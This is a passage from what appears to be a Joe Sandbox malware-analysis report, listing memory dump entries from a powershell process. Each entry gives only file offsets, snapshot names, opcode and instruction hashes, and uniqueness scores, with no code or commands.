                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 56d706c6acb749fc07b7dd659fb80ca5565cbd7b79d1a8c6c4a3b348215fb95f
                                    • Instruction ID: d06dcca078c64f2cbd8805cafa3cc27c7b9b2bc09ec612ba8320e95fd2f3d45c
                                    • Opcode Fuzzy Hash: 56d706c6acb749fc07b7dd659fb80ca5565cbd7b79d1a8c6c4a3b348215fb95f
                                    • Instruction Fuzzy Hash: 105190B0A05359AFCB15CFA5D854BEEBFF2AF89304F148029E851A7391DB34AD45CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7f87188b53aefaa46c16346231ee3638148369a46d5d335488f0a5e451b124a3
                                    • Instruction ID: 69b0d68976d3fe22749daf13c80cc669f8cc44060a36e7a0f7be46f9c9a37000
                                    • Opcode Fuzzy Hash: 7f87188b53aefaa46c16346231ee3638148369a46d5d335488f0a5e451b124a3
                                    • Instruction Fuzzy Hash: 41414CB46122049FCB58EF78D450A6EBBF7EF89309F60846DD505EB390DB35AC018BA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a7d0453d9c969dc4cc370fcf68b60601d242bc3dcbc2c9f2870b8cafcf9f2bd6
                                    • Instruction ID: 7bbc68fee09aabd17a92ff5fb5826e62cf517431594bfb856cbac9440016c274
                                    • Opcode Fuzzy Hash: a7d0453d9c969dc4cc370fcf68b60601d242bc3dcbc2c9f2870b8cafcf9f2bd6
                                    • Instruction Fuzzy Hash: 82414CB46122049FCB48EF78D450A6EBBF7EF89309F60846DD505EB390DB35AC018BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e4ae2be351b907c1703a7d38ac8f3546031f2e85a3b95c588359cefa9c5d6e65
                                    • Instruction ID: f2d9362d2ffc3c420c11becf24686f5141015c3d721d9563492956d587af85da
                                    • Opcode Fuzzy Hash: e4ae2be351b907c1703a7d38ac8f3546031f2e85a3b95c588359cefa9c5d6e65
                                    • Instruction Fuzzy Hash: E0414FB5B001149FEB14DB75C854BAEB7F6EFC8214F1580A9E909AB3A1DF319C41DB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1054309a4ecd8fd5a66bb1a8f58b479c87ffc6aed5c0ea3a61dcb8026bd51a5b
                                    • Instruction ID: 6484bce8d1cd9ba0e8070a554836f133b5f3609c0204fa53ff263fa13d4ab79e
                                    • Opcode Fuzzy Hash: 1054309a4ecd8fd5a66bb1a8f58b479c87ffc6aed5c0ea3a61dcb8026bd51a5b
                                    • Instruction Fuzzy Hash: C841FFB8306741CFC328DB39DA85966B7E6BF82255354947DD44A8B710CB32E883CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 88424acaa3f98db5fcec49cd1b101ab6f23a254e95eb4e8f18335655316879a0
                                    • Instruction ID: 5ff97ad227fb59576fce1b1d24592cf27e64fbb1994adc906588cb63f1755398
                                    • Opcode Fuzzy Hash: 88424acaa3f98db5fcec49cd1b101ab6f23a254e95eb4e8f18335655316879a0
                                    • Instruction Fuzzy Hash: 4931B3B96063168BCB24DA74CA447FB7BE6AF84254F085A7DD846C7384EB38C946C7D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c01bc510b9480c8bc2ffcd9b98144be35ca96bd6c5d5da987a4764dcc462e31
                                    • Instruction ID: ed6e185c32cfa6e15627525d5930e58c4de3623c93c5d7e4d65ac45c53e9eb85
                                    • Opcode Fuzzy Hash: 2c01bc510b9480c8bc2ffcd9b98144be35ca96bd6c5d5da987a4764dcc462e31
                                    • Instruction Fuzzy Hash: 3731ABB97022068BDB24DA24C644BFB77E6AB88254F045A3CD847C7384EB38D946CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9d35402f668621568759751ab212206a8ae3207fcc2d93195709cb3296d4b84c
                                    • Instruction ID: 4f6c4bb2b08d6010dab989dcd1588335afacdb2532d6d983cf6bb5eb64463dad
                                    • Opcode Fuzzy Hash: 9d35402f668621568759751ab212206a8ae3207fcc2d93195709cb3296d4b84c
                                    • Instruction Fuzzy Hash: C531B0B5E0120A9BDF14CFA4D9407EEB7B2EF85308F10843EE505AB644DB72A956CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f0b34d90d91ccd4c94dd535d8546ee5d040795da2e94110f6e8042b839416b3d
                                    • Instruction ID: a253e1f95e71fc9330e354cff179bb76d8dae9f48089b3ca8775a30b38dd8a2a
                                    • Opcode Fuzzy Hash: f0b34d90d91ccd4c94dd535d8546ee5d040795da2e94110f6e8042b839416b3d
                                    • Instruction Fuzzy Hash: 33318EB97101118FCB04EB79C955AAE77E6EF88618F14446DE9029B3A0DF34DD02CBD2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a7543787e1f0dc2f503f83de6ae6dc1d55b19740fbbd5d4e48c9df6026e3ec2a
                                    • Instruction ID: eda723c935f93bb99667036c72cddc4a25ff4ad138fdba2c6b53680d4be58dc3
                                    • Opcode Fuzzy Hash: a7543787e1f0dc2f503f83de6ae6dc1d55b19740fbbd5d4e48c9df6026e3ec2a
                                    • Instruction Fuzzy Hash: C53158742122009FCB15EF74E40065EB7F3EB8930AF60857DD105AB390DB36DC068BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a9839ce79e88169875f38d513b01e25915420a0a892bb3908c1baca2a0103ba5
                                    • Instruction ID: 84aee5c6c79f30c21b85dff9ae614a298fc8ad9cfe61d26dada9e06491c966f7
                                    • Opcode Fuzzy Hash: a9839ce79e88169875f38d513b01e25915420a0a892bb3908c1baca2a0103ba5
                                    • Instruction Fuzzy Hash: 0C316834A00209DFDB11DF60CA45BADBBB1BF89300F048598EA45AB261D775AE81CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 913ec118460e7647458e18dc98030785ca5d42622aa0d84176cf23d33bca47f6
                                    • Instruction ID: ea05233a2fe283c076adb34f138b376c27604aae5ddb0a7b1690cb17c555ea5f
                                    • Opcode Fuzzy Hash: 913ec118460e7647458e18dc98030785ca5d42622aa0d84176cf23d33bca47f6
                                    • Instruction Fuzzy Hash: 6A218EB0B042548FD754DF68C880BAE77E6EF89714F158069E509DB7A1DB31DD018BE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 969483c781639dac47f40071e685e5a0648cd59d0ef47f9325d6cc32b2541bfe
                                    • Instruction ID: c14e5b9c6eb277776576a576ec5cd89e7d54e7c90bffd8da340ff2d44148e62f
                                    • Opcode Fuzzy Hash: 969483c781639dac47f40071e685e5a0648cd59d0ef47f9325d6cc32b2541bfe
                                    • Instruction Fuzzy Hash: 3E214CB4B042148FDB54DF69C840BAE77E6EF89754F158069E909DB3A1DB31EC018BE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fce2a9967187a42f73df1497e31f94fb33939a1fd159fdff852df3a50264de58
                                    • Instruction ID: ed81727000a97e10032a9b511b7c08071854e8fb8cf438fe46d336d14a64a029
                                    • Opcode Fuzzy Hash: fce2a9967187a42f73df1497e31f94fb33939a1fd159fdff852df3a50264de58
                                    • Instruction Fuzzy Hash: 7C318FB0D0534A9BEB14DFB4C8487EEBBF1AF54318F149429C012FB281DB79A884CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7951749b672c13c2709694a8d9648db60dbd4b1bf5554bfeb85ac65d22088515
                                    • Instruction ID: 96196f001211826fe5054aa4a2f67f688d328c572c66160a6d57b3c0ec78def1
                                    • Opcode Fuzzy Hash: 7951749b672c13c2709694a8d9648db60dbd4b1bf5554bfeb85ac65d22088515
                                    • Instruction Fuzzy Hash: 48119070A012559BEB09DBA9C400FEEBBB6AF8A308F144129D505AB380DF75AD55CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5b3d25b34bd08d6ab64ea00b438b666cf9e67b1aae517373b66b111c6e454cf7
                                    • Instruction ID: 5e285f4f47d315c877b1d83b629b62a90d70e78358377429bcf52e3763250195
                                    • Opcode Fuzzy Hash: 5b3d25b34bd08d6ab64ea00b438b666cf9e67b1aae517373b66b111c6e454cf7
                                    • Instruction Fuzzy Hash: 89119EB4A093469FC702CF28C89086ABBB5FF4A310B1644ABD505DB3A2C735FC45CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76dca0932311872538c90402ff98148554467d446b468e1b272528cac68d373f
                                    • Instruction ID: 38b9bfc04d0645bf35448be5fafe811b47409cb9c52f7dd1565c1f4fe0bf71bd
                                    • Opcode Fuzzy Hash: 76dca0932311872538c90402ff98148554467d446b468e1b272528cac68d373f
                                    • Instruction Fuzzy Hash: 7711BBB4610344CFCB16DF64D860A9ABBF2BF8A308F1180ACD905AB391CB35AD42CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d06be1af510f6f686b84fe6ba2bc917376ad79595070fc4a85085f43e4f7cde5
                                    • Instruction ID: 5951ef37f1dc2de75f0d8830f3429515377817a42258017f68e20993edbb5e91
                                    • Opcode Fuzzy Hash: d06be1af510f6f686b84fe6ba2bc917376ad79595070fc4a85085f43e4f7cde5
                                    • Instruction Fuzzy Hash: 33018CB5B11119AB8F04DE99D8409AFBBAAFFD8254B14812AE808DB754E730ED0187E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a6a029820c4530a08e0508b5d9ba4382ce3633e6706156276d82ae800d583f67
                                    • Instruction ID: 0d0b70dd02b1fad0653beba87678f249cb0e65a5109a188619c489b706f1bf42
                                    • Opcode Fuzzy Hash: a6a029820c4530a08e0508b5d9ba4382ce3633e6706156276d82ae800d583f67
                                    • Instruction Fuzzy Hash: 00116A74A00105DFDB08DF68D494AEDBBB2EF88315F118069D901BB3A0CB31AC45CFA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d231ba63eb42ae582e0a44c08f62175eb257c5fdc5296c6f21ff0f5f73f07ba9
                                    • Instruction ID: df17fc2ae045e5e0216c38b2c68d0d969e2f36aa85396674bb496dc53e9bd35d
                                    • Opcode Fuzzy Hash: d231ba63eb42ae582e0a44c08f62175eb257c5fdc5296c6f21ff0f5f73f07ba9
                                    • Instruction Fuzzy Hash: 5C115A74A00205DFDB08EF68D494A9EBBB6EF8D315F118469D901BB3A1CB75AC41CFA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4e831f1e089108a7574ff52035243a56fa5e5bb28701fed39cc31e93ce72d8bf
                                    • Instruction ID: 4bbc1449c640b8ca055db0f5636baa632773d8f69ef8976205b965fa640887b8
                                    • Opcode Fuzzy Hash: 4e831f1e089108a7574ff52035243a56fa5e5bb28701fed39cc31e93ce72d8bf
                                    • Instruction Fuzzy Hash: 901130B59002488FCB20CF9AD488BDEFFF4FB89324F248529D419A7600C375A945CFA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ef7b4f200947445d61c2dfead8af4606bf71f0529adc08d0391d32a52137edd1
                                    • Instruction ID: 0be23355112a6f017cfd037f3bd75b5e8fbb76327ee66f11cc76ca49ea3971dd
                                    • Opcode Fuzzy Hash: ef7b4f200947445d61c2dfead8af4606bf71f0529adc08d0391d32a52137edd1
                                    • Instruction Fuzzy Hash: 54019EB5B11109AB8B04DF99C8409AFFBAAFFD8254B148029E8089B750D730EC0187A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1039ddfc50a422a140de550e20667ba783ca82e8b76cafebc7f4261469f29633
                                    • Instruction ID: 48430f9d47fd9abd0273a9a2d5cb752631b25856153a7217cfed3620f3f2f7af
                                    • Opcode Fuzzy Hash: 1039ddfc50a422a140de550e20667ba783ca82e8b76cafebc7f4261469f29633
                                    • Instruction Fuzzy Hash: 1E0125B8A05515AFCB04CB59D880DAEF7B5FB8C314B2141A9E91AAB311C732FC41CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.425725246.0000000004C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_4c0d000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6abfbee860ed134d22c2a4d9a85c95d403677a932fec4c7b67bf0418f3f1cc8b
                                    • Instruction ID: 31a6d82a35abdaccfa8b17be0f6341137de417bcf9cee1ff4c0b9fda2959287a
                                    • Opcode Fuzzy Hash: 6abfbee860ed134d22c2a4d9a85c95d403677a932fec4c7b67bf0418f3f1cc8b
                                    • Instruction Fuzzy Hash: 8101296140D3C09ED7128B259C94B62BFB4EF43228F0D81DBD9899F2D7C2699949CB72
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.425725246.0000000004C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_4c0d000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f2320d421b2fef4d165c9095c1a3719f93cd5b1ff15952dd83fa4d13351d04c9
                                    • Instruction ID: 2b74a6b352080a318fbd9fd0ee21758abd1c1697a5f02b4f87f6a3222dbc01a9
                                    • Opcode Fuzzy Hash: f2320d421b2fef4d165c9095c1a3719f93cd5b1ff15952dd83fa4d13351d04c9
                                    • Instruction Fuzzy Hash: BF01F7716083409EE7108E66ECC4B63BB98EF4126CF0CC11AED4A5F2C6C379A945CAB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 19f838b5fdb6754e2273f7f3c5544f98a8ae3995d16876f12be2dfec3aa6f70d
                                    • Instruction ID: b6cc7c9bbb0b60e89cc15d2d87ca50c59d6b6d2f97edf43b7b22caa77dda561e
                                    • Opcode Fuzzy Hash: 19f838b5fdb6754e2273f7f3c5544f98a8ae3995d16876f12be2dfec3aa6f70d
                                    • Instruction Fuzzy Hash: AFF0C2B97061153B9B08DB5A9840D6BF7DBEFD9168714C13AEA09CBB50EA30EC0083A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1079ab10df20bdfbe9403fc97a86809d88f789c8dc81fdcd78b05b0b7dd26083
                                    • Instruction ID: 694f93a11a0998aa2d24033c8a0619709008c05871f068b3b5dc25d948f0d65e
                                    • Opcode Fuzzy Hash: 1079ab10df20bdfbe9403fc97a86809d88f789c8dc81fdcd78b05b0b7dd26083
                                    • Instruction Fuzzy Hash: BDF0F6797051142B9B18C76A9840D6FEBDBEFD8168714C53EE509CBB50EA30EC008790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d0f83b8542c6758a4c1d660609a0d7dce79f627ba236d047f1a87acfe880e6c0
                                    • Instruction ID: 3753b2db908c416be0d204c6f439e32c3d64ae81951e3c08791833cadf5577c2
                                    • Opcode Fuzzy Hash: d0f83b8542c6758a4c1d660609a0d7dce79f627ba236d047f1a87acfe880e6c0
                                    • Instruction Fuzzy Hash: FDF0F0B5309300DFC328CB26E946453BFEAFFC6255315847DE04A87650CA379842C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3110e38b5563c887c5f5552aaaa35a5c245b2e0e7add9a919255ef044749b853
                                    • Instruction ID: 0277ad47d449d4dde6d956f65f4a1faa7aa1e09eee328e028c27d48bb2b8d274
                                    • Opcode Fuzzy Hash: 3110e38b5563c887c5f5552aaaa35a5c245b2e0e7add9a919255ef044749b853
                                    • Instruction Fuzzy Hash: CCF0B4B63019119BC714DB5AE404A6AB7A6FBC8626B14407BE50DC7BA0CF36DC53C794
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ffa98085b54fec08b663440080ec980160b37c610d06b158828c8304ae514b6c
                                    • Instruction ID: e7eca9eab8ed4eded1151736af2038bf38efdfbdec398be6b870e1435518937b
                                    • Opcode Fuzzy Hash: ffa98085b54fec08b663440080ec980160b37c610d06b158828c8304ae514b6c
                                    • Instruction Fuzzy Hash: E8F019B5A01309EFDF65CF64D880BEDB7B2AB84219F5090AAE4049A250DB3099D5CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ffa98085b54fec08b663440080ec980160b37c610d06b158828c8304ae514b6c
                                    • Instruction ID: e7eca9eab8ed4eded1151736af2038bf38efdfbdec398be6b870e1435518937b
                                    • Opcode Fuzzy Hash: ffa98085b54fec08b663440080ec980160b37c610d06b158828c8304ae514b6c
                                    • Instruction Fuzzy Hash: E8F019B5A01309EFDF65CF64D880BEDB7B2AB84219F5090AAE4049A250DB3099D5CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455910081.0000000007EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ec0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9c27879bc236fdaeab1ed24220470d14783610355c44a8c91df18edd34c52e1c
                                    • Instruction ID: af1e19d4229880ca31d65edc957af8c3c42815be9339f58225c3e1d9b6b36a3e
                                    • Opcode Fuzzy Hash: 9c27879bc236fdaeab1ed24220470d14783610355c44a8c91df18edd34c52e1c
                                    • Instruction Fuzzy Hash: 54F0E9356142585ECB219B29DC947DA7FB5DF89321F0043A6D954E7381DA304D51CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 27c598461d8fa3b3c805acc242900ace25e3d7a6b596c0dab67296a48f5d0e16
                                    • Instruction ID: 38699ceb3036bd0af6c689acc58204c540d364dc284bbee5910c5689a6183927
                                    • Opcode Fuzzy Hash: 27c598461d8fa3b3c805acc242900ace25e3d7a6b596c0dab67296a48f5d0e16
                                    • Instruction Fuzzy Hash: AEF0A975701249CFCB11CF98E8C48AABBF1FB453147108996D94A8B116C735F80ACF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d386c1a14b033d6796399b23af9a14b908f207442be0157205d8c1411582714a
                                    • Instruction ID: 961a6517d2ae8e9fc24e485bf44d11652de8df0f1dee3d093769a11df32709ef
                                    • Opcode Fuzzy Hash: d386c1a14b033d6796399b23af9a14b908f207442be0157205d8c1411582714a
                                    • Instruction Fuzzy Hash: DFF027747092845F8709D378982656E7F768FC311D72082BDC404CBAC0EF219D059792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.455634274.0000000007EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ea0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
